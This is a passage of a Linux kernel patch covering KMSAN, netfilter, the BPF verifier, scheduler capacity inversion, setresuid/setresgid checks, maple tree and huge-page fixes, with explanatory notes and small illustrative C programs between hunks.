+-					    unsigned long end,
+-					    phys_addr_t phys_addr,
+-					    pgprot_t prot,
+-					    unsigned int page_shift)
++static inline int kmsan_ioremap_page_range(unsigned long start,
++					   unsigned long end,
++					   phys_addr_t phys_addr, pgprot_t prot,
++					   unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_iounmap_page_range(unsigned long start,
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 7be5bb4c94b6d..20ca1613f2e3e 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -291,6 +291,7 @@ struct nf_bridge_info {
+ 	u8			pkt_otherhost:1;
+ 	u8			in_prerouting:1;
+ 	u8			bridged_dnat:1;
++	u8			sabotage_in_done:1;
+ 	__u16			frag_max_size;
+ 	struct net_device	*physindev;
+ 
+@@ -4684,7 +4685,7 @@ static inline void nf_reset_ct(struct sk_buff *skb)
+ 
+ static inline void nf_reset_trace(struct sk_buff *skb)
+ {
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	skb->nf_trace = 0;
+ #endif
+ }
+@@ -4704,7 +4705,7 @@ static inline void __nf_copy(struct sk_buff *dst, const struct sk_buff *src,
+ 	dst->_nfct = src->_nfct;
+ 	nf_conntrack_get(skb_nfct(src));
+ #endif
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	if (copy)
+ 		dst->nf_trace = src->nf_trace;
+ #endif
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 1daededfa75ed..6bacbf57ac175 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -1078,6 +1078,10 @@ struct nft_chain {
+ };
+ 
+ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain);
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem);
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set);
+ 
+ enum nft_chain_types {
+ 	NFT_CHAIN_T_DEFAULT = 0,
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index e57f867191ef1..eb53e96b7a29c 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -505,7 +505,7 @@ TRACE_EVENT(f2fs_truncate_partial_nodes,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+-		__field(nid_t,	nid[3])
++		__array(nid_t,	nid, 3)
+ 		__field(int,	depth)
+ 		__field(int,	err)
+ 	),
+diff --git a/init/Kconfig b/init/Kconfig
+index 0c214af99085d..2028ed4d50f5b 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -892,18 +892,14 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-11,12 array-bounds globally.
+-# We may want to target only particular configurations some day.
++# Currently, disable gcc-11+ array-bounds globally.
++# It's still broken in gcc-13, so no upper bound yet.
+ config GCC11_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+-config GCC12_NO_ARRAY_BOUNDS
+-	def_bool y
+-
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
+-	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC_VERSION < 120000 && GCC11_NO_ARRAY_BOUNDS
+-	default y if CC_IS_GCC && GCC_VERSION >= 120000 && GCC_VERSION < 130000 && GCC12_NO_ARRAY_BOUNDS
++	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC11_NO_ARRAY_BOUNDS
+ 
+ #
+ # For architectures that know their GCC __int128 support is sound
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index ea21e008bf856..8db2ed564939b 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2682,6 +2682,21 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 			}
+ 		} else if (opcode == BPF_EXIT) {
+ 			return -ENOTSUPP;
++		} else if (BPF_SRC(insn->code) == BPF_X) {
++			if (!(*reg_mask & (dreg | sreg)))
++				return 0;
++			/* dreg <cond> sreg
++			 * Both dreg and sreg need precision before
++			 * this insn. If only sreg was marked precise
++			 * before, it would be equally necessary to
++			 * propagate it to dreg.
++			 */
++			*reg_mask |= (sreg | dreg);
++			 /* else dreg <cond> K
++			  * Only dreg still needs precision before
++			  * this insn, so for the K-based conditional
++			  * there is nothing new to be marked.
++			  */
+ 		}
+ 	} else if (class == BPF_LD) {
+ 		if (!(*reg_mask & dreg))
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index ec2d913280e6a..f70c4a7fb4ef3 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4465,12 +4465,16 @@ static inline int util_fits_cpu(unsigned long util,
+ 	 * For uclamp_max, we can tolerate a drop in performance level as the
+ 	 * goal is to cap the task. So it's okay if it's getting less.
+ 	 *
+-	 * In case of capacity inversion, which is not handled yet, we should
+-	 * honour the inverted capacity for both uclamp_min and uclamp_max all
+-	 * the time.
++	 * In case of capacity inversion we should honour the inverted capacity
++	 * for both uclamp_min and uclamp_max all the time.
+ 	 */
+-	capacity_orig = capacity_orig_of(cpu);
+-	capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
++	capacity_orig = cpu_in_capacity_inversion(cpu);
++	if (capacity_orig) {
++		capacity_orig_thermal = capacity_orig;
++	} else {
++		capacity_orig = capacity_orig_of(cpu);
++		capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
++	}
+ 
+ 	/*
+ 	 * We want to force a task to fit a cpu as implied by uclamp_max.
+@@ -8866,16 +8870,82 @@ static unsigned long scale_rt_capacity(int cpu)
+ 
+ static void update_cpu_capacity(struct sched_domain *sd, int cpu)
+ {
++	unsigned long capacity_orig = arch_scale_cpu_capacity(cpu);
+ 	unsigned long capacity = scale_rt_capacity(cpu);
+ 	struct sched_group *sdg = sd->groups;
++	struct rq *rq = cpu_rq(cpu);
+ 
+-	cpu_rq(cpu)->cpu_capacity_orig = arch_scale_cpu_capacity(cpu);
++	rq->cpu_capacity_orig = capacity_orig;
+ 
+ 	if (!capacity)
+ 		capacity = 1;
+ 
+-	cpu_rq(cpu)->cpu_capacity = capacity;
+-	trace_sched_cpu_capacity_tp(cpu_rq(cpu));
++	rq->cpu_capacity = capacity;
++
++	/*
++	 * Detect if the performance domain is in capacity inversion state.
++	 *
++	 * Capacity inversion happens when another perf domain with equal or
++	 * lower capacity_orig_of() ends up having higher capacity than this
++	 * domain after subtracting thermal pressure.
++	 *
++	 * We only take into account thermal pressure in this detection as it's
++	 * the only metric that actually results in *real* reduction of
++	 * capacity due to performance points (OPPs) being dropped or becoming
++	 * unreachable due to thermal throttling.
++	 *
++	 * We assume:
++	 *   * That all cpus in a perf domain have the same capacity_orig
++	 *     (same uArch).
++	 *   * Thermal pressure will impact all cpus in this perf domain
++	 *     equally.
++	 */
++	if (sched_energy_enabled()) {
++		unsigned long inv_cap = capacity_orig - thermal_load_avg(rq);
++		struct perf_domain *pd;
++
++		rcu_read_lock();
++
++		pd = rcu_dereference(rq->rd->pd);
++		rq->cpu_capacity_inverted = 0;
++
++		for (; pd; pd = pd->next) {
++			struct cpumask *pd_span = perf_domain_span(pd);
++			unsigned long pd_cap_orig, pd_cap;
++
++			/* We can't be inverted against our own pd */
++			if (cpumask_test_cpu(cpu_of(rq), pd_span))
++				continue;
++
++			cpu = cpumask_any(pd_span);
++			pd_cap_orig = arch_scale_cpu_capacity(cpu);
++
++			if (capacity_orig < pd_cap_orig)
++				continue;
++
++			/*
++			 * Handle the case where multiple perf domains have the
++			 * same capacity_orig but one of them is under higher
++			 * thermal pressure. We record it as capacity
++			 * inversion.
++			 */
++			if (capacity_orig == pd_cap_orig) {
++				pd_cap = pd_cap_orig - thermal_load_avg(cpu_rq(cpu));
++
++				if (pd_cap > inv_cap) {
++					rq->cpu_capacity_inverted = inv_cap;
++					break;
++				}
++			} else if (pd_cap_orig > inv_cap) {
++				rq->cpu_capacity_inverted = inv_cap;
++				break;
++			}
++		}
++
++		rcu_read_unlock();
++	}
++
++	trace_sched_cpu_capacity_tp(rq);
+ 
+ 	sdg->sgc->capacity = capacity;
+ 	sdg->sgc->min_capacity = capacity;
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index d6d488e8eb554..5f18460f62f0f 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -1041,6 +1041,7 @@ struct rq {
+ 
+ 	unsigned long		cpu_capacity;
+ 	unsigned long		cpu_capacity_orig;
++	unsigned long		cpu_capacity_inverted;
+ 
+ 	struct balance_callback *balance_callback;
+ 
+@@ -2878,6 +2879,24 @@ static inline unsigned long capacity_orig_of(int cpu)
+ 	return cpu_rq(cpu)->cpu_capacity_orig;
+ }
+ 
++/*
++ * Returns inverted capacity if the CPU is in capacity inversion state.
++ * 0 otherwise.
++ *
++ * Capacity inversion detection only considers thermal impact where actual
++ * performance points (OPPs) get dropped.
++ *
++ * Capacity inversion state happens when another performance domain that has
++ * equal or lower capacity_orig_of() becomes effectively larger than the perf
++ * domain this CPU belongs to due to thermal pressure throttling it hard.
++ *
++ * See comment in update_cpu_capacity().
++ */
++static inline unsigned long cpu_in_capacity_inversion(int cpu)
++{
++	return cpu_rq(cpu)->cpu_capacity_inverted;
++}
++
+ /**
+  * enum cpu_util_type - CPU utilization type
+  * @FREQUENCY_UTIL:	Utilization used to select frequency
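
To make the fair.c/sched.h pair concrete: a CPU is in capacity inversion
when, after subtracting its own thermal pressure, some other performance
domain of equal or lower original capacity ends up with more usable capacity.
A toy calculation with assumed numbers on the kernel's 0..1024 capacity
scale:

#include <stdio.h>

struct pd { unsigned long cap_orig, thermal; };

/* Inverted capacity of pds[self], or 0 if not inverted. */
static unsigned long inverted_cap(const struct pd *pds, int n, int self)
{
	unsigned long inv = pds[self].cap_orig - pds[self].thermal;

	for (int i = 0; i < n; i++) {
		if (i == self || pds[i].cap_orig > pds[self].cap_orig)
			continue;	/* only equal-or-lower domains count */
		if (pds[i].cap_orig - pds[i].thermal > inv)
			return inv;	/* a "smaller" domain now beats us */
	}
	return 0;
}

int main(void)
{
	/* Big cluster throttled hard; little cluster not throttled. */
	struct pd pds[] = { { 1024, 600 }, { 512, 0 } };

	printf("big:    %lu\n", inverted_cap(pds, 2, 0));	/* 424 */
	printf("little: %lu\n", inverted_cap(pds, 2, 1));	/* 0 */
	return 0;
}
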
+diff --git a/kernel/sys.c b/kernel/sys.c
+index 88b31f096fb2d..c85e1abf7b7c7 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -664,6 +664,7 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	struct cred *new;
+ 	int retval;
+ 	kuid_t kruid, keuid, ksuid;
++	bool ruid_new, euid_new, suid_new;
+ 
+ 	kruid = make_kuid(ns, ruid);
+ 	keuid = make_kuid(ns, euid);
+@@ -678,25 +679,29 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	if ((suid != (uid_t) -1) && !uid_valid(ksuid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((ruid == (uid_t) -1 || uid_eq(kruid, old->uid)) &&
++	    (euid == (uid_t) -1 || (uid_eq(keuid, old->euid) &&
++				    uid_eq(keuid, old->fsuid))) &&
++	    (suid == (uid_t) -1 || uid_eq(ksuid, old->suid)))
++		return 0;
++
++	ruid_new = ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
++		   !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid);
++	euid_new = euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
++		   !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid);
++	suid_new = suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
++		   !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid);
++	if ((ruid_new || euid_new || suid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETUID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+ 
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETUID)) {
+-		if (ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
+-		    !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid))
+-			goto error;
+-		if (euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
+-		    !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid))
+-			goto error;
+-		if (suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
+-		    !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid))
+-			goto error;
+-	}
+-
+ 	if (ruid != (uid_t) -1) {
+ 		new->uid = kruid;
+ 		if (!uid_eq(kruid, old->uid)) {
+@@ -761,6 +766,7 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	struct cred *new;
+ 	int retval;
+ 	kgid_t krgid, kegid, ksgid;
++	bool rgid_new, egid_new, sgid_new;
+ 
+ 	krgid = make_kgid(ns, rgid);
+ 	kegid = make_kgid(ns, egid);
+@@ -773,23 +779,28 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	if ((sgid != (gid_t) -1) && !gid_valid(ksgid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((rgid == (gid_t) -1 || gid_eq(krgid, old->gid)) &&
++	    (egid == (gid_t) -1 || (gid_eq(kegid, old->egid) &&
++				    gid_eq(kegid, old->fsgid))) &&
++	    (sgid == (gid_t) -1 || gid_eq(ksgid, old->sgid)))
++		return 0;
++
++	rgid_new = rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
++		   !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid);
++	egid_new = egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
++		   !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid);
++	sgid_new = sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
++		   !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid);
++	if ((rgid_new || egid_new || sgid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETGID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETGID)) {
+-		if (rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
+-		    !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid))
+-			goto error;
+-		if (egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
+-		    !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid))
+-			goto error;
+-		if (sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
+-		    !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid))
+-			goto error;
+-	}
+ 
+ 	if (rgid != (gid_t) -1)
+ 		new->gid = krgid;
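
The sys.c rework computes up front whether each requested ID is genuinely
new, i.e. differs from all of the current real, effective and saved IDs;
only then is CAP_SETUID (or CAP_SETGID) required, and a complete no-op now
returns before prepare_creds(). A compressed model of the ruid_new/euid_new/
suid_new predicates using plain integers (the kernel compares kuid_t values
via uid_eq()):

#include <stdio.h>
#include <stdbool.h>

struct cred { int uid, euid, suid; };

/* -1 means "leave this ID unchanged", as in setresuid(2). */
static bool id_is_new(int req, const struct cred *old)
{
	return req != -1 && req != old->uid &&
	       req != old->euid && req != old->suid;
}

static bool needs_cap_setuid(int ruid, int euid, int suid,
			     const struct cred *old)
{
	return id_is_new(ruid, old) || id_is_new(euid, old) ||
	       id_is_new(suid, old);
}

int main(void)
{
	struct cred old = { .uid = 1000, .euid = 1000, .suid = 0 };

	/* Swapping between IDs already held needs no capability... */
	printf("%d\n", needs_cap_setuid(0, 1000, -1, &old));	/* 0 */
	/* ...but introducing a brand-new ID does. */
	printf("%d\n", needs_cap_setuid(1001, -1, -1, &old));	/* 1 */
	return 0;
}
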
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 39f34ea7a9be5..9fe25ce9937b8 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -1293,26 +1293,21 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 	node = mas->alloc;
+ 	node->request_count = 0;
+ 	while (requested) {
+-		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->node_count) {
+-			unsigned int offset = node->node_count;
+-
+-			slots = (void **)&node->slot[offset];
+-			max_req -= offset;
+-		} else {
+-			slots = (void **)&node->slot;
+-		}
+-
++		max_req = MAPLE_ALLOC_SLOTS - node->node_count;
++		slots = (void **)&node->slot[node->node_count];
+ 		max_req = min(requested, max_req);
+ 		count = mt_alloc_bulk(gfp, max_req, slots);
+ 		if (!count)
+ 			goto nomem_bulk;
+ 
++		if (node->node_count == 0) {
++			node->slot[0]->node_count = 0;
++			node->slot[0]->request_count = 0;
++		}
++
+ 		node->node_count += count;
+ 		allocated += count;
+ 		node = node->slot[0];
+-		node->node_count = 0;
+-		node->request_count = 0;
+ 		requested -= count;
+ 	}
+ 	mas->alloc->total = allocated;
+@@ -4968,7 +4963,8 @@ not_found:
+  * Return: True if found in a leaf, false otherwise.
+  *
+  */
+-static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
++static bool mas_rev_awalk(struct ma_state *mas, unsigned long size,
++		unsigned long *gap_min, unsigned long *gap_max)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	struct maple_node *node = mas_mn(mas);
+@@ -5033,8 +5029,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+-		mas->min = min;
+-		mas->max = min + gap - 1;
++		*gap_min = min;
++		*gap_max = min + gap - 1;
+ 		return true;
+ 	}
+ 
+@@ -5058,10 +5054,10 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	unsigned long pivot, min, gap = 0;
+-	unsigned char offset;
+-	unsigned long *gaps;
+-	unsigned long *pivots = ma_pivots(mas_mn(mas), type);
+-	void __rcu **slots = ma_slots(mas_mn(mas), type);
++	unsigned char offset, data_end;
++	unsigned long *gaps, *pivots;
++	void __rcu **slots;
++	struct maple_node *node;
+ 	bool found = false;
+ 
+ 	if (ma_is_dense(type)) {
+@@ -5069,13 +5065,15 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ 		return true;
+ 	}
+ 
+-	gaps = ma_gaps(mte_to_node(mas->node), type);
++	node = mas_mn(mas);
++	pivots = ma_pivots(node, type);
++	slots = ma_slots(node, type);
++	gaps = ma_gaps(node, type);
+ 	offset = mas->offset;
+ 	min = mas_safe_min(mas, pivots, offset);
+-	for (; offset < mt_slots[type]; offset++) {
+-		pivot = mas_safe_pivot(mas, pivots, offset, type);
+-		if (offset && !pivot)
+-			break;
++	data_end = ma_data_end(node, type, pivots, mas->max);
++	for (; offset <= data_end; offset++) {
++		pivot = mas_logical_pivot(mas, pivots, offset, type);
+ 
+ 		/* Not within lower bounds */
+ 		if (mas->index > pivot)
+@@ -5310,6 +5308,9 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 	unsigned long *pivots;
+ 	enum maple_type mt;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas))
+ 		mas_start(mas);
+ 	else if (mas->offset >= 2)
+@@ -5364,6 +5365,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ {
+ 	struct maple_enode *last = mas->node;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas)) {
+ 		mas_start(mas);
+ 		mas->offset = mas_data_end(mas);
+@@ -5383,7 +5387,7 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	mas->index = min;
+ 	mas->last = max;
+ 
+-	while (!mas_rev_awalk(mas, size)) {
++	while (!mas_rev_awalk(mas, size, &min, &max)) {
+ 		if (last == mas->node) {
+ 			if (!mas_rewind_node(mas))
+ 				return -EBUSY;
+@@ -5398,17 +5402,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	if (unlikely(mas->offset == MAPLE_NODE_SLOTS))
+ 		return -EBUSY;
+ 
+-	/*
+-	 * mas_rev_awalk() has set mas->min and mas->max to the gap values.  If
+-	 * the maximum is outside the window we are searching, then use the last
+-	 * location in the search.
+-	 * mas->max and mas->min is the range of the gap.
+-	 * mas->index and mas->last are currently set to the search range.
+-	 */
+-
+ 	/* Trim the upper limit to the max. */
+-	if (mas->max <= mas->last)
+-		mas->last = mas->max;
++	if (max <= mas->last)
++		mas->last = max;
+ 
+ 	mas->index = mas->last - size + 1;
+ 	return 0;
+diff --git a/mm/backing-dev.c b/mm/backing-dev.c
+index c30419a5e1197..bf5525c2e561a 100644
+--- a/mm/backing-dev.c
++++ b/mm/backing-dev.c
+@@ -380,6 +380,15 @@ static LIST_HEAD(offline_cgwbs);
+ static void cleanup_offline_cgwbs_workfn(struct work_struct *work);
+ static DECLARE_WORK(cleanup_offline_cgwbs_work, cleanup_offline_cgwbs_workfn);
+ 
++static void cgwb_free_rcu(struct rcu_head *rcu_head)
++{
++	struct bdi_writeback *wb = container_of(rcu_head,
++			struct bdi_writeback, rcu);
++
++	percpu_ref_exit(&wb->refcnt);
++	kfree(wb);
++}
++
+ static void cgwb_release_workfn(struct work_struct *work)
+ {
+ 	struct bdi_writeback *wb = container_of(work, struct bdi_writeback,
+@@ -402,11 +411,10 @@ static void cgwb_release_workfn(struct work_struct *work)
+ 	list_del(&wb->offline_node);
+ 	spin_unlock_irq(&cgwb_lock);
+ 
+-	percpu_ref_exit(&wb->refcnt);
+ 	wb_exit(wb);
+ 	bdi_put(bdi);
+ 	WARN_ON_ONCE(!list_empty(&wb->b_attached));
+-	kfree_rcu(wb, rcu);
++	call_rcu(&wb->rcu, cgwb_free_rcu);
+ }
+ 
+ static void cgwb_release(struct percpu_ref *refcnt)
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index b8d654963df87..b20fef29e5bb5 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -1805,10 +1805,10 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 	if (is_swap_pmd(*pmd)) {
+ 		swp_entry_t entry = pmd_to_swp_entry(*pmd);
+ 		struct page *page = pfn_swap_entry_to_page(entry);
++		pmd_t newpmd;
+ 
+ 		VM_BUG_ON(!is_pmd_migration_entry(*pmd));
+ 		if (is_writable_migration_entry(entry)) {
+-			pmd_t newpmd;
+ 			/*
+ 			 * A protection check is difficult so
+ 			 * just be safe and disable write
+@@ -1822,8 +1822,16 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 				newpmd = pmd_swp_mksoft_dirty(newpmd);
+ 			if (pmd_swp_uffd_wp(*pmd))
+ 				newpmd = pmd_swp_mkuffd_wp(newpmd);
+-			set_pmd_at(mm, addr, pmd, newpmd);
++		} else {
++			newpmd = *pmd;
+ 		}
++
++		if (uffd_wp)
++			newpmd = pmd_swp_mkuffd_wp(newpmd);
++		else if (uffd_wp_resolve)
++			newpmd = pmd_swp_clear_uffd_wp(newpmd);
++		if (!pmd_same(*pmd, newpmd))
++			set_pmd_at(mm, addr, pmd, newpmd);
+ 		goto unlock;
+ 	}
+ #endif
+@@ -2647,9 +2655,10 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 	VM_BUG_ON_FOLIO(!folio_test_large(folio), folio);
+ 
+ 	is_hzp = is_huge_zero_page(&folio->page);
+-	VM_WARN_ON_ONCE_FOLIO(is_hzp, folio);
+-	if (is_hzp)
++	if (is_hzp) {
++		pr_warn_ratelimited("Called split_huge_page for huge zero page\n");
+ 		return -EBUSY;
++	}
+ 
+ 	if (folio_test_writeback(folio))
+ 		return -EBUSY;
+@@ -3233,6 +3242,8 @@ int set_pmd_migration_entry(struct page_vma_mapped_walk *pvmw,
+ 	pmdswp = swp_entry_to_pmd(entry);
+ 	if (pmd_soft_dirty(pmdval))
+ 		pmdswp = pmd_swp_mksoft_dirty(pmdswp);
++	if (pmd_uffd_wp(pmdval))
++		pmdswp = pmd_swp_mkuffd_wp(pmdswp);
+ 	set_pmd_at(mm, address, pvmw->pmd, pmdswp);
+ 	page_remove_rmap(page, vma, true);
+ 	put_page(page);
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index 77a76bcf15f57..ef72d3df4b65b 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -561,6 +561,10 @@ static int __collapse_huge_page_isolate(struct vm_area_struct *vma,
+ 			result = SCAN_PTE_NON_PRESENT;
+ 			goto out;
+ 		}
++		if (pte_uffd_wp(pteval)) {
++			result = SCAN_PTE_UFFD_WP;
++			goto out;
++		}
+ 		page = vm_normal_page(vma, address, pteval);
+ 		if (unlikely(!page) || unlikely(is_zone_device_page(page))) {
+ 			result = SCAN_PAGE_NULL;
+diff --git a/mm/kmsan/hooks.c b/mm/kmsan/hooks.c
+index 3807502766a3e..ec0da72e65aa0 100644
+--- a/mm/kmsan/hooks.c
++++ b/mm/kmsan/hooks.c
+@@ -148,35 +148,74 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end)
+  * into the virtual memory. If those physical pages already had shadow/origin,
+  * those are ignored.
+  */
+-void kmsan_ioremap_page_range(unsigned long start, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift)
++int kmsan_ioremap_page_range(unsigned long start, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift)
+ {
+ 	gfp_t gfp_mask = GFP_KERNEL | __GFP_ZERO;
+ 	struct page *shadow, *origin;
+ 	unsigned long off = 0;
+-	int nr;
++	int nr, err = 0, clean = 0, mapped;
+ 
+ 	if (!kmsan_enabled || kmsan_in_runtime())
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	kmsan_enter_runtime();
+-	for (int i = 0; i < nr; i++, off += PAGE_SIZE) {
++	for (int i = 0; i < nr; i++, off += PAGE_SIZE, clean = i) {
+ 		shadow = alloc_pages(gfp_mask, 1);
+ 		origin = alloc_pages(gfp_mask, 1);
+-		__vmap_pages_range_noflush(
++		if (!shadow || !origin) {
++			err = -ENOMEM;
++			goto ret;
++		}
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_shadow(start + off),
+ 			vmalloc_shadow(start + off + PAGE_SIZE), prot, &shadow,
+ 			PAGE_SHIFT);
+-		__vmap_pages_range_noflush(
++		if (mapped) {
++			err = mapped;
++			goto ret;
++		}
++		shadow = NULL;
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_origin(start + off),
+ 			vmalloc_origin(start + off + PAGE_SIZE), prot, &origin,
+ 			PAGE_SHIFT);
++		if (mapped) {
++			__vunmap_range_noflush(
++				vmalloc_shadow(start + off),
++				vmalloc_shadow(start + off + PAGE_SIZE));
++			err = mapped;
++			goto ret;
++		}
++		origin = NULL;
++	}
++	/* Page mapping loop finished normally; nothing to clean up. */
++	clean = 0;
++
++ret:
++	if (clean > 0) {
++		/*
++		 * Something went wrong. Clean up shadow/origin pages allocated
++		 * on the last loop iteration, then delete mappings created
++		 * during the previous iterations.
++		 */
++		if (shadow)
++			__free_pages(shadow, 1);
++		if (origin)
++			__free_pages(origin, 1);
++		__vunmap_range_noflush(
++			vmalloc_shadow(start),
++			vmalloc_shadow(start + clean * PAGE_SIZE));
++		__vunmap_range_noflush(
++			vmalloc_origin(start),
++			vmalloc_origin(start + clean * PAGE_SIZE));
+ 	}
+ 	flush_cache_vmap(vmalloc_shadow(start), vmalloc_shadow(end));
+ 	flush_cache_vmap(vmalloc_origin(start), vmalloc_origin(end));
+ 	kmsan_leave_runtime();
++	return err;
+ }
+ 
+ void kmsan_iounmap_page_range(unsigned long start, unsigned long end)
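
The kmsan_ioremap_page_range() rework is an instance of the general "unwind
partial work on mid-loop failure" pattern: remember how many iterations
completed cleanly, and on error release the current iteration's resources
and undo all earlier ones. A generic standalone sketch (the allocation and
the injected failure are invented):

#include <stdio.h>
#include <stdlib.h>

#define N 8

static int setup_all(void *slots[N], int fail_at)
{
	int done = 0;

	for (int i = 0; i < N; i++) {
		if (i == fail_at)		/* simulated failure */
			goto unwind;
		slots[i] = malloc(16);
		if (!slots[i])
			goto unwind;
		done = i + 1;			/* iteration fully succeeded */
	}
	return 0;

unwind:
	for (int i = 0; i < done; i++) {	/* undo completed work only */
		free(slots[i]);
		slots[i] = NULL;
	}
	return -1;
}

int main(void)
{
	void *slots[N] = { 0 };

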